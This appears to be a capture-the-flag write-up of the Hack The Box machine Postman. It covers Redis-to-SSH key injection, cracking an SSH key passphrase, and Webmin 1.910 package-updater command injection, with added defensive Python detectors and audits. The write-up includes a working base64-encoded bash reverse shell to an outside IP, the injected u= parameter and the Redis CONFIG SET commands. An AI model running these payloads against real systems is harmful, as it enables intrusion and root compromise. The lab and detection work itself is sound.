Postman (HTB – Easy)

The machine exposes a personal website, a Redis instance, and a Webmin panel. Redis is abused to gain an SSH foothold. User pivoting is done via a passphrase-protected SSH key found on disk, and privilege escalation is achieved by exploiting a Webmin package update command injection.

Overview

Target: postman.htb
Initial vector: Redis → SSH key injection
Privilege escalation: Webmin 1.910 RCE via package updater

Enumeration

Nmap:

22/tcp    ssh
80/tcp    http (Apache)
6379/tcp  redis 4.0.9
10000/tcp Webmin MiniServ 1.910

Port 80 hosts a simple personal website with nothing directly exploitable. Port 6379 runs Redis without authentication.

Foothold – Redis to SSH

Follow the common Redis → SSH technique (HackTricks style): generate an SSH key pair locally, then use Redis to write the public key into the redis user's authorized_keys file (/var/lib/redis/.ssh) by changing where the RDB dump is saved.

Example flow:

$ ssh-keygen -t rsa -f id_rsa
$ redis-cli -h postman.htb
redis> CONFIG SET dir /var/lib/redis/.ssh
redis> CONFIG SET dbfilename "authorized_keys"
redis> SET x "ssh-rsa AAAA... your_key ..."
redis> SAVE

Then SSH in using the private key:

$ ssh -i id_rsa redis@postman.htb

You get a low-privileged shell but cannot read the user flag yet.
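
From the defender's side, the sequence above is loud: Redis MONITOR (or anything capturing the command stream) shows one client changing dir and dbfilename and then issuing SAVE. The Python below is an added example, not part of the original writeup, that parses constructed MONITOR lines, flags exactly that sequence per client, and checks a CONFIG GET style dictionary for the settings that make the technique possible in the first place (no requirepass, non-loopback bind, protected-mode off). The expected dump directory and the sample lines are this example's assumptions.

```python
import os
import re
from collections import defaultdict

# One line of `redis-cli MONITOR` output looks like (constructed sample):
#   1574082200.123456 [0 10.10.14.5:50210] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Directory the instance is expected to dump to. Assumption for this example
# (the Debian/Ubuntu package default); adjust to the audited host.
EXPECTED_DIR = "/var/lib/redis"

# Constructed MONITOR capture: a benign client, then a client that repoints the
# RDB dump into the redis user's ~/.ssh and saves (the pattern from the writeup).
SAMPLE_MONITOR = """\
OK
1574082190.000001 [0 10.10.10.1:40001] "SET" "session:42" "ok"
1574082191.000002 [0 10.10.10.1:40001] "SAVE"
1574082200.123456 [0 10.10.14.5:50210] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1574082201.223456 [0 10.10.14.5:50210] "CONFIG" "SET" "dbfilename" "authorized_keys"
1574082202.323456 [0 10.10.14.5:50210] "SET" "x" "ssh-rsa AAAA...constructed..."
1574082203.423456 [0 10.10.14.5:50210] "SAVE"
""".splitlines()


def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for one MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m.group("ts")),
            "client": m.group("client"),
            "args": ARG_RE.findall(m.group("args"))}


def detect_rdb_write_abuse(lines, expected_dir=EXPECTED_DIR):
    """Flag clients that redirect the RDB dump (CONFIG SET dir / dbfilename) and then SAVE.

    State is tracked per client so a benign SAVE from another connection is not blamed.
    """
    per_client = defaultdict(dict)
    alerts = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args = ev["args"]
        cmd = args[0].upper()
        state = per_client[ev["client"]]
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                state[key] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            reasons = []
            d = state.get("dir")
            f = state.get("dbfilename")
            if d is not None and os.path.normpath(d) != os.path.normpath(expected_dir):
                reasons.append(f"dir changed to {d}")
            if f is not None and not f.endswith(".rdb"):
                reasons.append(f"dbfilename changed to {f}")
            if reasons:
                alerts.append({"client": ev["client"], "ts": ev["ts"], "reasons": reasons})
    return alerts


def config_weaknesses(cfg):
    """cfg: dict of lower-case keys as returned by `CONFIG GET *`. Returns findings."""
    issues = []
    if not cfg.get("requirepass"):
        issues.append("no requirepass: anyone who can reach the port can run CONFIG SET")
    if cfg.get("protected-mode", "yes").lower() != "yes":
        issues.append("protected-mode disabled")
    bind = cfg.get("bind", "")
    if not bind or any(a not in ("127.0.0.1", "::1") for a in bind.split()):
        issues.append(f"bound to non-loopback address(es): {bind or '*'}")
    return issues


if __name__ == "__main__":
    for alert in detect_rdb_write_abuse(SAMPLE_MONITOR):
        print(alert)
    print(config_weaknesses({"requirepass": "", "bind": "0.0.0.0", "protected-mode": "no"}))
```

Any one of the three findings from config_weaknesses is enough for the writeup's foothold; with a password set and the service bound to loopback, the CONFIG SET / SAVE sequence is not reachable from the network at all.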

User Pivot – SSH Key for Matt

Enumerate the filesystem and find an SSH private key under /opt:

/opt/id_rsa

Copy it to your machine and crack the passphrase:

$ ssh2john id_rsa > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
-> computer2008

Use it to become Matt:

$ ssh -i id_rsa Matt@postman.htb

Now you can read the user flag and access Webmin as Matt.
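
The pivot works because a passphrase-protected copy of a user's key sits readable under /opt, outside any ~/.ssh, and the passphrase is in rockyou. The following is an added example, not from the writeup: a small audit that walks a directory tree, recognises PEM and OpenSSH private keys, reads whether they are encrypted (the Proc-Type header for legacy PEM, the cipher name in the openssh-key-v1 header for the newer format) and reports keys that are stray, readable by group or others, or unencrypted. The layout it builds is constructed to mirror the box; the key bodies are placeholders in which only the header fields the classifier reads are real.

```python
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(blob_b64):
    """Cipher name recorded in an OpenSSH-format key blob ('none' means unencrypted)."""
    raw = base64.b64decode(blob_b64)
    if not raw.startswith(OPENSSH_MAGIC):
        return None
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", raw[off:off + 4])
    return raw[off + 4:off + 4 + n].decode("ascii", errors="replace")


def classify_key_text(text):
    """True/False = private key, encrypted or not; None = not a private key."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY" not in lines[0]:
        return None
    if "OPENSSH PRIVATE KEY" in lines[0]:
        body = "".join(l for l in lines[1:] if not l.startswith("-----"))
        try:
            cipher = openssh_cipher(body)
        except (ValueError, struct.error):
            cipher = None  # unparseable: treat as unprotected so it gets reported
        return cipher not in (None, "none")
    # Legacy PEM: an encrypted key announces it in the Proc-Type header
    return any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines[1:4])


def find_stray_private_keys(root, key_dirs=(".ssh",)):
    """Report private keys outside a .ssh directory, readable by others, or without a passphrase."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    encrypted = classify_key_text(fh.read())
            except OSError:
                continue
            if encrypted is None:
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            info = {"path": path, "encrypted": encrypted, "mode": oct(mode),
                    "outside_ssh_dir": os.path.basename(dirpath) not in key_dirs,
                    "readable_by_others": bool(mode & 0o077)}
            if info["outside_ssh_dir"] or info["readable_by_others"] or not encrypted:
                findings.append(info)
    return findings


def constructed_openssh_key(cipher):
    """Constructed key text: real magic and cipher field, padding instead of key material."""
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode() + b"\x00" * 16
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy PEM header; the body is a placeholder, not key material.
LEGACY_ENCRYPTED_KEY = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

Y29uc3RydWN0ZWQgYm9keQ==
-----END RSA PRIVATE KEY-----
"""


def run_sample():
    """Build a constructed layout mirroring the box (key in ~/.ssh vs stray copy in /opt)."""
    layout = {
        "home/matt/.ssh/id_rsa": (constructed_openssh_key("aes256-ctr"), 0o600),  # in place, private
        "opt/id_rsa": (LEGACY_ENCRYPTED_KEY, 0o644),  # stray copy, readable by everyone
        "opt/readme.txt": ("not a key\n", 0o644),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (content, mode) in layout.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(content)
            os.chmod(path, mode)
        return find_stray_private_keys(root)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The audit does not try passphrases; it reports the conditions that made offline cracking possible (a key reachable by a low-privileged account, outside the owner's home). Passphrase strength itself is a policy matter this check cannot see.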

Privilege Escalation – Webmin RCE

Webmin 1.910 is running on port 10000. This version is vulnerable to command injection in the package updater (CVE-2019-12840 / Exploit-DB 46984).

Steps:

  1. Log in to Webmin as Matt.
  2. Go to System → Software Package Updates.
  3. Turn on Burp intercept and click Update Selected Packages.
  4. Send the /package-updates/update.cgi request to Repeater.
  5. Remove existing parameters and add a malicious u parameter.

Prepare a reverse shell payload:

$ echo -n 'bash -c "bash -i &> /dev/tcp/10.10.16.15/443 0>&1"' | base64

Use it in the u parameter:

u=acl%2Fapt&u=$(echo${IFS}YmFzaCAtYyAiYmFzaCAtaSAmPiAvZGV2L3RjcC8xMC4xMC4xNi4xNS80NDMgMD4mMSI=|base64${IFS}-d|bash)

Listener:

$ nc -nlvp 443

Trigger the request; because MiniServ runs as root, the shell that connects back is a root shell.
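
What makes this work is that update.cgi passes the u values through to a shell command and that MiniServ runs as root, so any shell metacharacter in u is executed with full privileges. The Python below is an added example and not Webmin's own code: a request-level check that applies an allow-list to u values on POSTs to /package-updates/update.cgi (the shape a WAF rule or a reverse-proxy filter would take), plus a banner check for the affected version range. The package-identifier character set and the sample body are this example's assumptions.

```python
import re
from urllib.parse import parse_qs

# Allow-list for a package identifier as update.cgi expects it ("acl/apt" in the
# writeup: module/package). The character set is this example's assumption, not
# Webmin's own validation code.
PACKAGE_ID_RE = re.compile(r'^[A-Za-z0-9._+:~/-]+$')
MINISERV_RE = re.compile(r'MiniServ[/ ](\d+)\.(\d+)')

# Constructed request body in the shape the writeup describes: a benign u value
# followed by one that carries a shell substitution.
SAMPLE_BODY = "u=acl%2Fapt&u=$(echo${IFS}Y29uc3RydWN0ZWQ=|base64${IFS}-d)"


def is_safe_package_param(value):
    """True if the value contains only characters a package identifier needs."""
    return bool(PACKAGE_ID_RE.match(value))


def triage_update_request(path, body):
    """Return the u= values of an update.cgi POST that fail the allow-list.

    An empty list means nothing to flag, or that the request targets another CGI.
    parse_qs splits each pair on the first '=' only, so '=' inside a value survives.
    """
    if not path.endswith("/package-updates/update.cgi"):
        return []
    params = parse_qs(body, keep_blank_values=True)
    return [v for v in params.get("u", []) if not is_safe_package_param(v)]


def is_affected_webmin_version(banner):
    """CVE-2019-12840 affects Webmin through 1.910. None if the banner has no version."""
    m = MINISERV_RE.search(banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2))) <= (1, 910)


if __name__ == "__main__":
    print(triage_update_request("/package-updates/update.cgi", SAMPLE_BODY))
    print(is_affected_webmin_version("MiniServ 1.910 (Webmin httpd)"))
```

The allow-list rejects the injected value while accepting acl/apt, and the version check turns the nmap banner from the enumeration step into a yes/no answer. Upgrading Webmin past the affected range removes the root cause; the request filter is a compensating control for hosts that cannot be patched immediately.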

Conclusion

Postman chains a classic Redis misconfiguration into SSH access, then pivots via a protected SSH key to a privileged user. Finally, a Webmin package update command injection provides root access, completing the compromise.